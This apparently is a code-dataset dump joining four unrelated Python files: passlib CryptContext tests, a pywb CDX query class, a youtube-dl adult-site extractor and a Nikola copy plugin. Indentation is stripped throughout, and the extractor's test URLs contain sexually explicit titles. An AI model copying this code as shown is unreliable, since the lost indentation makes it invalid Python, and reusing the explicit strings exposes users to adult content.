"""test basic encrypt/identify/verify functionality"""
handlers = [hash.md5_crypt, hash.des_crypt, hash.bsdi_crypt]
cc = CryptContext(handlers, bsdi_crypt__default_rounds=5)
# run through handlers
for crypt in handlers:
h = cc.encrypt("test", scheme=crypt.name)
self.assertEqual(cc.identify(h), crypt.name)
self.assertEqual(cc.identify(h, resolve=True), crypt)
self.assertTrue(cc.verify('test', h))
self.assertFalse(cc.verify('notest', h))
# test default
h = cc.encrypt("test")
self.assertEqual(cc.identify(h), "md5_crypt")
# test genhash
h = cc.genhash('secret', cc.genconfig())
self.assertEqual(cc.identify(h), 'md5_crypt')
h = cc.genhash('secret', cc.genconfig(), scheme='md5_crypt')
self.assertEqual(cc.identify(h), 'md5_crypt')
self.assertRaises(ValueError, cc.genhash, 'secret', cc.genconfig(), scheme="des_crypt")
def test_41_genconfig(self):
"""test genconfig() method"""
cc = CryptContext(schemes=["md5_crypt", "phpass"],
phpass__ident="H",
phpass__default_rounds=7,
admin__phpass__ident="P",
)
# uses default scheme
self.assertTrue(cc.genconfig().startswith("$1$"))
# override scheme
self.assertTrue(cc.genconfig(scheme="phpass").startswith("$H$5"))
# category override
self.assertTrue(cc.genconfig(scheme="phpass", category="admin").startswith("$P$5"))
self.assertTrue(cc.genconfig(scheme="phpass", category="staff").startswith("$H$5"))
# override scheme & custom settings
self.assertEqual(
cc.genconfig(scheme="phpass", salt='.'*8, rounds=8, ident='P'),
'$P$6........',
)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# test unicode category strings are accepted under py2
# this tests basic _get_record() used by encrypt/genhash/verify.
# we have to omit scheme=xxx so codepath is tested fully
if PY2:
c2 = cc.copy(default="phpass")
self.assertTrue(c2.genconfig(category=u("admin")).startswith("$P$5"))
self.assertTrue(c2.genconfig(category=u("staff")).startswith("$H$5"))
# throws error without schemes
self.assertRaises(KeyError, CryptContext().genconfig)
self.assertRaises(KeyError, CryptContext().genconfig, scheme='md5_crypt')
# bad scheme values
self.assertRaises(KeyError, cc.genconfig, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.genconfig, scheme=1, category='staff')
self.assertRaises(TypeError, cc.genconfig, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.genconfig, category=1)
def test_42_genhash(self):
"""test genhash() method"""
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
hash = cc.encrypt('stub')
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.genhash, secret, hash, **kwds)
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.genhash, 'secret', hash, **kwds)
# .. but should accept None if default scheme lacks config string
cc = CryptContext(["mysql323"])
self.assertIsInstance(cc.genhash("stub", None), str)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().genhash, 'secret', 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.genhash, 'secret', hash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.genhash, 'secret', hash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.genconfig, 'secret', hash, category=1)
def test_43_encrypt(self):
"""test encrypt() method"""
cc = CryptContext(**self.sample_4_dict)
# hash specific settings
self.assertEqual(
cc.encrypt("password", scheme="phpass", salt='.'*8),
'$H$5........De04R5Egz0aq8Tf.1eVhY/',
)
self.assertEqual(
cc.encrypt("password", scheme="phpass", salt='.'*8, ident="P"),
'$P$5........De04R5Egz0aq8Tf.1eVhY/',
)
# NOTE: more thorough job of rounds limits done below.
# min rounds
with self.assertWarningList(PasslibConfigWarning):
self.assertEqual(
cc.encrypt("password", rounds=1999, salt="nacl"),
'$5$rounds=2000$nacl$9/lTZ5nrfPuz8vphznnmHuDGFuvjSNvOEDsGmGfsS97',
)
with self.assertWarningList([]):
self.assertEqual(
cc.encrypt("password", rounds=2001, salt="nacl"),
'$5$rounds=2001$nacl$8PdeoPL4aXQnJ0woHhqgIw/efyfCKC2WHneOpnvF.31'
)
# NOTE: max rounds, etc tested in genconfig()
# make default > max throws error if attempted
self.assertRaises(ValueError, cc.copy,
sha256_crypt__default_rounds=4000)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.encrypt, secret, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().encrypt, 'secret')
# bad scheme values
self.assertRaises(KeyError, cc.encrypt, 'secret', scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.encrypt, 'secret', scheme=1)
# bad category values
self.assertRaises(TypeError, cc.encrypt, 'secret', category=1)
def test_44_identify(self):
"""test identify() border cases"""
handlers = ["md5_crypt", "des_crypt", "bsdi_crypt"]
cc = CryptContext(handlers, bsdi_crypt__default_rounds=5)
# check unknown hash
self.assertEqual(cc.identify('$9$232323123$1287319827'), None)
self.assertRaises(ValueError, cc.identify, '$9$232323123$1287319827', required=True)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.identify, hash, **kwds)
# throws error without schemes
cc = CryptContext()
self.assertIs(cc.identify('hash'), None)
self.assertRaises(KeyError, cc.identify, 'hash', required=True)
# bad category values
self.assertRaises(TypeError, cc.identify, None, category=1)
def test_45_verify(self):
"""test verify() scheme kwd"""
handlers = ["md5_crypt", "des_crypt", "bsdi_crypt"]
cc = CryptContext(handlers, bsdi_crypt__default_rounds=5)
h = hash.md5_crypt.encrypt("test")
# check base verify
self.assertTrue(cc.verify("test", h))
self.assertTrue(not cc.verify("notest", h))
# check verify using right alg
self.assertTrue(cc.verify('test', h, scheme='md5_crypt'))
self.assertTrue(not cc.verify('notest', h, scheme='md5_crypt'))
# check verify using wrong alg
self.assertRaises(ValueError, cc.verify, 'test', h, scheme='bsdi_crypt')
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# unknown hash should throw error
self.assertRaises(ValueError, cc.verify, 'stub', '$6$232323123$1287319827')
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
h = refhash = cc.encrypt('stub')
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify, secret, h, **kwds)
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for h, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify, 'secret', h, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().verify, 'secret', 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.verify, 'secret', refhash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.verify, 'secret', refhash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.verify, 'secret', refhash, category=1)
def test_46_needs_update(self):
"""test needs_update() method"""
cc = CryptContext(**self.sample_4_dict)
# check deprecated scheme
self.assertTrue(cc.needs_update('9XXD4trGYeGJA'))
self.assertFalse(cc.needs_update('$1$J8HC2RCr$HcmM.7NxB2weSvlw2FgzU0'))
# check min rounds
self.assertTrue(cc.needs_update('$5$rounds=1999$jD81UCoo.zI.UETs$Y7qSTQ6mTiU9qZB4fRr43wRgQq4V.5AAf7F97Pzxey/'))
self.assertFalse(cc.needs_update('$5$rounds=2000$228SSRje04cnNCaQ$YGV4RYu.5sNiBvorQDlO0WWQjyJVGKBcJXz3OtyQ2u8'))
# check max rounds
self.assertFalse(cc.needs_update('$5$rounds=3000$fS9iazEwTKi7QPW4$VasgBC8FqlOvD7x2HhABaMXCTh9jwHclPA9j5YQdns.'))
self.assertTrue(cc.needs_update('$5$rounds=3001$QlFHHifXvpFX4PLs$/0ekt7lSs/lOikSerQ0M/1porEHxYq7W/2hdFpxA3fA'))
#--------------------------------------------------------------
# test _bind_needs_update() framework
#--------------------------------------------------------------
bind_state = []
check_state = []
class dummy(uh.StaticHandler):
name = 'dummy'
_hash_prefix = '@'
@classmethod
def _bind_needs_update(cls, **settings):
bind_state.append(settings)
return cls._needs_update
@classmethod
def _needs_update(cls, hash, secret):
check_state.append((hash,secret))
return secret == "nu"
def _calc_checksum(self, secret):
from hashlib import md5
if isinstance(secret, unicode):
secret = secret.encode("utf-8")
return str_to_uascii(md5(secret).hexdigest())
# creating context should call bind function w/ settings
ctx = CryptContext([dummy])
self.assertEqual(bind_state, [{}])
# calling needs_update should query callback
hash = refhash = dummy.encrypt("test")
self.assertFalse(ctx.needs_update(hash))
self.assertEqual(check_state, [(hash,None)])
del check_state[:]
# now with a password
self.assertFalse(ctx.needs_update(hash, secret='bob'))
self.assertEqual(check_state, [(hash,'bob')])
del check_state[:]
# now when it returns True
self.assertTrue(ctx.needs_update(hash, secret='nu'))
self.assertEqual(check_state, [(hash,'nu')])
del check_state[:]
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.needs_update, hash, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().needs_update, 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.needs_update, refhash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.needs_update, refhash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.needs_update, refhash, category=1)
def test_47_verify_and_update(self):
"""test verify_and_update()"""
cc = CryptContext(**self.sample_4_dict)
# create some hashes
h1 = cc.encrypt("password", scheme="des_crypt")
h2 = cc.encrypt("password", scheme="sha256_crypt")
# check bad password, deprecated hash
ok, new_hash = cc.verify_and_update("wrongpass", h1)
self.assertFalse(ok)
self.assertIs(new_hash, None)
# check bad password, good hash
ok, new_hash = cc.verify_and_update("wrongpass", h2)
self.assertFalse(ok)
self.assertIs(new_hash, None)
# check right password, deprecated hash
ok, new_hash = cc.verify_and_update("password", h1)
self.assertTrue(ok)
self.assertTrue(cc.identify(new_hash), "sha256_crypt")
# check right password, good hash
ok, new_hash = cc.verify_and_update("password", h2)
self.assertTrue(ok)
self.assertIs(new_hash, None)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
hash = refhash = cc.encrypt('stub')
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify_and_update, secret, hash, **kwds)
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify_and_update, 'secret', hash, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().verify_and_update, 'secret', 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.verify_and_update, 'secret', refhash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.verify_and_update, 'secret', refhash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.verify_and_update, 'secret', refhash, category=1)
#===================================================================
# rounds options
#===================================================================
# NOTE: the follow tests check how _CryptRecord handles
# the min/max/default/vary_rounds options, via the output of
# genconfig(). it's assumed encrypt() takes the same codepath.
def test_50_rounds_limits(self):
"""test rounds limits"""
cc = CryptContext(schemes=["sha256_crypt"],
all__min_rounds=2000,
all__max_rounds=3000,
all__default_rounds=2500,
)
#--------------------------------------------------
# min_rounds
#--------------------------------------------------
# set below handler minimum
with self.assertWarningList([PasslibConfigWarning]*2):
c2 = cc.copy(all__min_rounds=500, all__max_rounds=None,
all__default_rounds=500)
self.assertEqual(c2.genconfig(salt="nacl"), "$5$rounds=1000$nacl$")
# below policy minimum
with self.assertWarningList(PasslibConfigWarning):
self.assertEqual(
cc.genconfig(rounds=1999, salt="nacl"),
'$5$rounds=2000$nacl$',
)
# equal to policy minimum
self.assertEqual(
cc.genconfig(rounds=2000, salt="nacl"),
'$5$rounds=2000$nacl$',
)
# above policy minimum
self.assertEqual(
cc.genconfig(rounds=2001, salt="nacl"),
'$5$rounds=2001$nacl$'
)
#--------------------------------------------------
# max rounds
#--------------------------------------------------
# set above handler max
with self.assertWarningList([PasslibConfigWarning]*2):
c2 = cc.copy(all__max_rounds=int(1e9)+500, all__min_rounds=None,
all__default_rounds=int(1e9)+500)
self.assertEqual(c2.genconfig(salt="nacl"),
"$5$rounds=999999999$nacl$")
# above policy max
with self.assertWarningList(PasslibConfigWarning):
self.assertEqual(
cc.genconfig(rounds=3001, salt="nacl"),
'$5$rounds=3000$nacl$'
)
# equal policy max
self.assertEqual(
cc.genconfig(rounds=3000, salt="nacl"),
'$5$rounds=3000$nacl$'
)
# below policy max
self.assertEqual(
cc.genconfig(rounds=2999, salt="nacl"),
'$5$rounds=2999$nacl$',
)
#--------------------------------------------------
# default_rounds
#--------------------------------------------------
# explicit default rounds
self.assertEqual(cc.genconfig(salt="nacl"), '$5$rounds=2500$nacl$')
# fallback default rounds - use handler's
df = hash.sha256_crypt.default_rounds
c2 = cc.copy(all__default_rounds=None, all__max_rounds=df<<1)
self.assertEqual(c2.genconfig(salt="nacl"),
'$5$rounds=%d$nacl$' % df)
# fallback default rounds - use handler's, but clipped to max rounds
c2 = cc.copy(all__default_rounds=None, all__max_rounds=3000)
self.assertEqual(c2.genconfig(salt="nacl"), '$5$rounds=3000$nacl$')
# TODO: test default falls back to mx / mn if handler has no default.
# default rounds - out of bounds
self.assertRaises(ValueError, cc.copy, all__default_rounds=1999)
cc.copy(all__default_rounds=2000)
cc.copy(all__default_rounds=3000)
self.assertRaises(ValueError, cc.copy, all__default_rounds=3001)
#--------------------------------------------------
# border cases
#--------------------------------------------------
# invalid min/max bounds
c2 = CryptContext(schemes=["sha256_crypt"])
self.assertRaises(ValueError, c2.copy, all__min_rounds=-1)
self.assertRaises(ValueError, c2.copy, all__max_rounds=-1)
self.assertRaises(ValueError, c2.copy, all__min_rounds=2000,
all__max_rounds=1999)
# test bad values
self.assertRaises(ValueError, CryptContext, all__min_rounds='x')
self.assertRaises(ValueError, CryptContext, all__max_rounds='x')
self.assertRaises(ValueError, CryptContext, all__vary_rounds='x')
self.assertRaises(ValueError, CryptContext, all__default_rounds='x')
# test bad types rejected
bad = NotImplemented
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__min_rounds=bad)
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__max_rounds=bad)
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__vary_rounds=bad)
self.assertRaises(TypeError, CryptContext, "sha256_crypt", all__default_rounds=bad)
def test_51_linear_vary_rounds(self):
"""test linear vary rounds"""
cc = CryptContext(schemes=["sha256_crypt"],
all__min_rounds=1995,
all__max_rounds=2005,
all__default_rounds=2000,
)
# test negative
self.assertRaises(ValueError, cc.copy, all__vary_rounds=-1)
self.assertRaises(ValueError, cc.copy, all__vary_rounds="-1%")
self.assertRaises(ValueError, cc.copy, all__vary_rounds="101%")
# test static
c2 = cc.copy(all__vary_rounds=0)
self.assert_rounds_range(c2, "sha256_crypt", 2000, 2000)
c2 = cc.copy(all__vary_rounds="0%")
self.assert_rounds_range(c2, "sha256_crypt", 2000, 2000)
# test absolute
c2 = cc.copy(all__vary_rounds=1)
self.assert_rounds_range(c2, "sha256_crypt", 1999, 2001)
c2 = cc.copy(all__vary_rounds=100)
self.assert_rounds_range(c2, "sha256_crypt", 1995, 2005)
# test relative
c2 = cc.copy(all__vary_rounds="0.1%")
self.assert_rounds_range(c2, "sha256_crypt", 1998, 2002)
c2 = cc.copy(all__vary_rounds="100%")
self.assert_rounds_range(c2, "sha256_crypt", 1995, 2005)
def test_52_log2_vary_rounds(self):
"""test log2 vary rounds"""
cc = CryptContext(schemes=["bcrypt"],
all__min_rounds=15,
all__max_rounds=25,
all__default_rounds=20,
)
# test negative
self.assertRaises(ValueError, cc.copy, all__vary_rounds=-1)
self.assertRaises(ValueError, cc.copy, all__vary_rounds="-1%")
self.assertRaises(ValueError, cc.copy, all__vary_rounds="101%")
# test static
c2 = cc.copy(all__vary_rounds=0)
self.assert_rounds_range(c2, "bcrypt", 20, 20)
c2 = cc.copy(all__vary_rounds="0%")
self.assert_rounds_range(c2, "bcrypt", 20, 20)
# test absolute
c2 = cc.copy(all__vary_rounds=1)
self.assert_rounds_range(c2, "bcrypt", 19, 21)
c2 = cc.copy(all__vary_rounds=100)
self.assert_rounds_range(c2, "bcrypt", 15, 25)
# test relative - should shift over at 50% mark
c2 = cc.copy(all__vary_rounds="1%")
self.assert_rounds_range(c2, "bcrypt", 20, 20)
c2 = cc.copy(all__vary_rounds="49%")
self.assert_rounds_range(c2, "bcrypt", 20, 20)
c2 = cc.copy(all__vary_rounds="50%")
self.assert_rounds_range(c2, "bcrypt", 19, 20)
c2 = cc.copy(all__vary_rounds="100%")
self.assert_rounds_range(c2, "bcrypt", 15, 21)
def assert_rounds_range(self, context, scheme, lower, upper):
"""helper to check vary_rounds covers specified range"""
# NOTE: this runs enough times the min and max *should* be hit,
# though there's a faint chance it will randomly fail.
handler = context.handler(scheme)
salt = handler.default_salt_chars[0:1] * handler.max_salt_size
seen = set()
for i in irange(300):
h = context.genconfig(scheme, salt=salt)
r = handler.from_string(h).rounds
seen.add(r)
self.assertEqual(min(seen), lower, "vary_rounds had wrong lower limit:")
self.assertEqual(max(seen), upper, "vary_rounds had wrong upper limit:")
#===================================================================
# feature tests
#===================================================================
def test_60_min_verify_time(self):
"""test verify() honors min_verify_time"""
delta = .05
if TICK_RESOLUTION >= delta/10:
raise self.skipTest("timer not accurate enough")
min_delay = 2*delta
min_verify_time = 5*delta
max_delay = 8*delta
class TimedHash(uh.StaticHandler):
"""psuedo hash that takes specified amount of time"""
name = "timed_hash"
delay = 0
@classmethod
def identify(cls, hash):
return True
def _calc_checksum(self, secret):
quicksleep(self.delay)
return to_unicode(secret + 'x')
# check mvt issues a warning, and then filter for remainder of test
with self.assertWarningList(["'min_verify_time' is deprecated"]*2):
cc = CryptContext([TimedHash], min_verify_time=min_verify_time,
admin__context__min_verify_time=min_verify_time*2)
warnings.filterwarnings("ignore", "'min_verify_time' is deprecated")
def timecall(func, *args, **kwds):
start = tick()
result = func(*args, **kwds)
return tick()-start, result
# verify genhash delay works
TimedHash.delay = min_delay
elapsed, result = timecall(TimedHash.genhash, 'stub', None)
self.assertEqual(result, 'stubx')
self.assertAlmostEqual(elapsed, min_delay, delta=delta)
# ensure min verify time is honored
# correct password
elapsed, result = timecall(cc.verify, "stub", "stubx")
self.assertTrue(result)
self.assertAlmostEqual(elapsed, min_delay, delta=delta)
# incorrect password
elapsed, result = timecall(cc.verify, "blob", "stubx")
self.assertFalse(result)
self.assertAlmostEqual(elapsed, min_verify_time, delta=delta)
# incorrect password w/ special category setting
elapsed, result = timecall(cc.verify, "blob", "stubx", category="admin")
self.assertFalse(result)
self.assertAlmostEqual(elapsed, min_verify_time*2, delta=delta)
# ensure taking longer emits a warning.
TimedHash.delay = max_delay
with self.assertWarningList(".*verify exceeded min_verify_time"):
elapsed, result = timecall(cc.verify, "blob", "stubx")
self.assertFalse(result)
self.assertAlmostEqual(elapsed, max_delay, delta=delta)
# reject values < 0
self.assertRaises(ValueError, CryptContext, min_verify_time=-1)
def test_61_autodeprecate(self):
"""test deprecated='auto' is handled correctly"""
def getstate(ctx, category=None):
return [ctx._is_deprecated_scheme(scheme, category) for scheme in ctx.schemes()]
# correctly reports default
ctx = CryptContext("sha256_crypt,md5_crypt,des_crypt", deprecated="auto")
self.assertEqual(getstate(ctx, None), [False, True, True])
self.assertEqual(getstate(ctx, "admin"), [False, True, True])
# correctly reports changed default
ctx.update(default="md5_crypt")
self.assertEqual(getstate(ctx, None), [True, False, True])
self.assertEqual(getstate(ctx, "admin"), [True, False, True])
# category default is handled correctly
ctx.update(admin__context__default="des_crypt")
self.assertEqual(getstate(ctx, None), [True, False, True])
self.assertEqual(getstate(ctx, "admin"), [True, True, False])
# handles 1 scheme
ctx = CryptContext(["sha256_crypt"], deprecated="auto")
self.assertEqual(getstate(ctx, None), [False])
self.assertEqual(getstate(ctx, "admin"), [False])
# disallow auto & other deprecated schemes at same time.
self.assertRaises(ValueError, CryptContext, "sha256_crypt,md5_crypt",
deprecated="auto,md5_crypt")
self.assertRaises(ValueError, CryptContext, "sha256_crypt,md5_crypt",
deprecated="md5_crypt,auto")
#===================================================================
# handler deprecation detectors
#===================================================================
def test_62_bcrypt_update(self):
"""test verify_and_update / needs_update corrects bcrypt padding"""
# see issue 25.
bcrypt = hash.bcrypt
PASS1 = "test"
BAD1 = "$2a$04$yjDgE74RJkeqC0/1NheSScrvKeu9IbKDpcQf/Ox3qsrRS/Kw42qIS"
GOOD1 = "$2a$04$yjDgE74RJkeqC0/1NheSSOrvKeu9IbKDpcQf/Ox3qsrRS/Kw42qIS"
ctx = CryptContext(["bcrypt"], bcrypt__rounds=4)
self.assertTrue(ctx.needs_update(BAD1))
self.assertFalse(ctx.needs_update(GOOD1))
if bcrypt.has_backend():
self.assertEqual(ctx.verify_and_update(PASS1,GOOD1), (True,None))
with self.assertWarningList(["incorrect.*padding bits"]*2):
self.assertEqual(ctx.verify_and_update("x",BAD1), (False,None))
ok, new_hash = ctx.verify_and_update(PASS1, BAD1)
self.assertTrue(ok)
self.assertTrue(new_hash and new_hash != BAD1)
def test_63_bsdi_crypt_update(self):
"""test verify_and_update / needs_update corrects bsdi even rounds"""
even_hash = '_Y/../cG0zkJa6LY6k4c'
odd_hash = '_Z/..TgFg0/ptQtpAgws'
secret = 'test'
ctx = CryptContext(['bsdi_crypt'], bsdi_crypt__min_rounds=5)
self.assertTrue(ctx.needs_update(even_hash))
self.assertFalse(ctx.needs_update(odd_hash))
self.assertEqual(ctx.verify_and_update(secret, odd_hash), (True,None))
self.assertEqual(ctx.verify_and_update("x", even_hash), (False,None))
ok, new_hash = ctx.verify_and_update(secret, even_hash)
self.assertTrue(ok)
self.assertTrue(new_hash and new_hash != even_hash)
#===================================================================
# eoc
#===================================================================
#=============================================================================
# LazyCryptContext
#=============================================================================
class dummy_2(uh.StaticHandler):
name = "dummy_2"
class LazyCryptContextTest(TestCase):
descriptionPrefix = "LazyCryptContext"
def setUp(self):
# make sure this isn't registered before OR after
unload_handler_name("dummy_2")
self.addCleanup(unload_handler_name, "dummy_2")
def test_kwd_constructor(self):
"""test plain kwds"""
self.assertFalse(has_crypt_handler("dummy_2"))
register_crypt_handler_path("dummy_2", "passlib.tests.test_context")
cc = LazyCryptContext(iter(["dummy_2", "des_crypt"]), deprecated=["des_crypt"])
self.assertFalse(has_crypt_handler("dummy_2", True))
self.assertEqual(cc.schemes(), ("dummy_2", "des_crypt"))
self.assertTrue(cc._is_deprecated_scheme("des_crypt"))
self.assertTrue(has_crypt_handler("dummy_2", True))
def test_callable_constructor(self):
self.assertFalse(has_crypt_handler("dummy_2"))
register_crypt_handler_path("dummy_2", "passlib.tests.test_context")
def onload(flag=False):
self.assertTrue(flag)
return dict(schemes=iter(["dummy_2", "des_crypt"]), deprecated=["des_crypt"])
cc = LazyCryptContext(onload=onload, flag=True)
self.assertFalse(has_crypt_handler("dummy_2", True))
self.assertEqual(cc.schemes(), ("dummy_2", "des_crypt"))
self.assertTrue(cc._is_deprecated_scheme("des_crypt"))
self.assertTrue(has_crypt_handler("dummy_2", True))
#=============================================================================
# eof
#=============================================================================
| mit |
ikreymer/pywb | pywb/warcserver/index/query.py | 1 | 3663 | from six.moves.urllib.parse import urlencode
from pywb.warcserver.index.cdxobject import CDXException
from pywb.utils.canonicalize import calc_search_range
from pywb.utils.format import to_bool
#=================================================================
class CDXQuery(object):
def __init__(self, params):
self.params = params
alt_url = self.params.get('alt_url')
url = alt_url or self.url
if not self.params.get('matchType'):
if url.startswith('*.'):
url = self.params['url'] = url[2:]
self.params['matchType'] = 'domain'
elif url.endswith('*'):
url = self.params['url'] = url[:-1]
self.params['matchType'] = 'prefix'
else:
self.params['matchType'] = 'exact'
if alt_url:
self.params['alt_url'] = url
start, end = calc_search_range(url=url,
match_type=self.params['matchType'],
url_canon=self.params.get('_url_canon'))
self.params['key'] = start.encode('utf-8')
self.params['end_key'] = end.encode('utf-8')
@property
def key(self):
return self.params['key']
@property
def end_key(self):
return self.params['end_key']
def set_key(self, key, end_key):
self.params['key'] = key
self.params['end_key'] = end_key
@property
def url(self):
try:
return self.params['url']
except KeyError:
msg = 'A url= param must be specified to query the cdx server'
raise CDXException(msg)
@property
def match_type(self):
return self.params.get('matchType', 'exact')
@property
def is_exact(self):
return self.match_type == 'exact'
@property
def allow_fuzzy(self):
return self._get_bool('allowFuzzy')
@property
def output(self):
return self.params.get('output', 'text')
@property
def limit(self):
return int(self.params.get('limit', 100000))
@property
def collapse_time(self):
return self.params.get('collapseTime')
@property
def resolve_revisits(self):
return self._get_bool('resolveRevisits')
@property
def filters(self):
return self.params.get('filter', [])
@property
def fields(self):
v = self.params.get('fields')
# check old param name
if not v:
v = self.params.get('fl')
return v.split(',') if v else None
@property
def from_ts(self):
return self.params.get('from') or self.params.get('from_ts')
@property
def to_ts(self):
return self.params.get('to')
@property
def closest(self):
# sort=closest is not required
return self.params.get('closest')
@property
def reverse(self):
# sort=reverse overrides reverse=0
return (self._get_bool('reverse') or
self.params.get('sort') == 'reverse')
@property
def custom_ops(self):
return self.params.get('custom_ops', [])
@property
def secondary_index_only(self):
return self._get_bool('showPagedIndex')
@property
def page(self):
return int(self.params.get('page', 0))
@property
def page_size(self):
return self.params.get('pageSize')
@property
def page_count(self):
return self._get_bool('showNumPages')
def _get_bool(self, name):
v = self.params.get(name)
return to_bool(v)
def urlencode(self):
return urlencode(self.params, True)
| gpl-3.0 |
daineseh/kodi-plugin.video.ted-talks-chinese | youtube_dl/extractor/extremetube.py | 31 | 3146 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
sanitized_Request,
str_to_int,
)
class ExtremeTubeIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?extremetube\.com/(?:[^/]+/)?video/(?P<id>[^/#?&]+)'
_TESTS = [{
'url': 'http://www.extremetube.com/video/music-video-14-british-euro-brit-european-cumshots-swallow-652431',
'md5': '344d0c6d50e2f16b06e49ca011d8ac69',
'info_dict': {
'id': 'music-video-14-british-euro-brit-european-cumshots-swallow-652431',
'ext': 'mp4',
'title': 'Music Video 14 british euro brit european cumshots swallow',
'uploader': 'unknown',
'view_count': int,
'age_limit': 18,
}
}, {
'url': 'http://www.extremetube.com/gay/video/abcde-1234',
'only_matching': True,
}, {
'url': 'http://www.extremetube.com/video/latina-slut-fucked-by-fat-black-dick',
'only_matching': True,
}, {
'url': 'http://www.extremetube.com/video/652431',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
req = sanitized_Request(url)
req.add_header('Cookie', 'age_verified=1')
webpage = self._download_webpage(req, video_id)
video_title = self._html_search_regex(
r'<h1 [^>]*?title="([^"]+)"[^>]*>', webpage, 'title')
uploader = self._html_search_regex(
r'Uploaded by:\s*</strong>\s*(.+?)\s*</div>',
webpage, 'uploader', fatal=False)
view_count = str_to_int(self._html_search_regex(
r'Views:\s*</strong>\s*<span>([\d,\.]+)</span>',
webpage, 'view count', fatal=False))
flash_vars = self._parse_json(
self._search_regex(
r'var\s+flashvars\s*=\s*({.+?});', webpage, 'flash vars'),
video_id)
formats = []
for quality_key, video_url in flash_vars.items():
height = int_or_none(self._search_regex(
r'quality_(\d+)[pP]$', quality_key, 'height', default=None))
if not height:
continue
f = {
'url': video_url,
}
mobj = re.search(
r'/(?P<height>\d{3,4})[pP]_(?P<bitrate>\d+)[kK]_\d+', video_url)
if mobj:
height = int(mobj.group('height'))
bitrate = int(mobj.group('bitrate'))
f.update({
'format_id': '%dp-%dk' % (height, bitrate),
'height': height,
'tbr': bitrate,
})
else:
f.update({
'format_id': '%dp' % height,
'height': height,
})
formats.append(f)
self._sort_formats(formats)
return {
'id': video_id,
'title': video_title,
'formats': formats,
'uploader': uploader,
'view_count': view_count,
'age_limit': 18,
}
| gpl-2.0 |
kotnik/nikola | nikola/plugins/task_copy_files.py | 3 | 2203 | # -*- coding: utf-8 -*-
# Copyright © 2012-2013 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
from nikola.plugin_categories import Task
from nikola import utils
class CopyFiles(Task):
"""Copy static files into the output folder."""
name = "copy_files"
def gen_tasks(self):
"""Copy static files into the output folder."""
kw = {
'files_folders': self.site.config['FILES_FOLDERS'],
'output_folder': self.site.config['OUTPUT_FOLDER'],
'filters': self.site.config['FILTERS'],
}
flag = False
for src in kw['files_folders']:
dst = kw['output_folder']
filters = kw['filters']
real_dst = os.path.join(dst, kw['files_folders'][src])
for task in utils.copy_tree(src, real_dst, link_cutoff=dst):
flag = True
task['basename'] = self.name
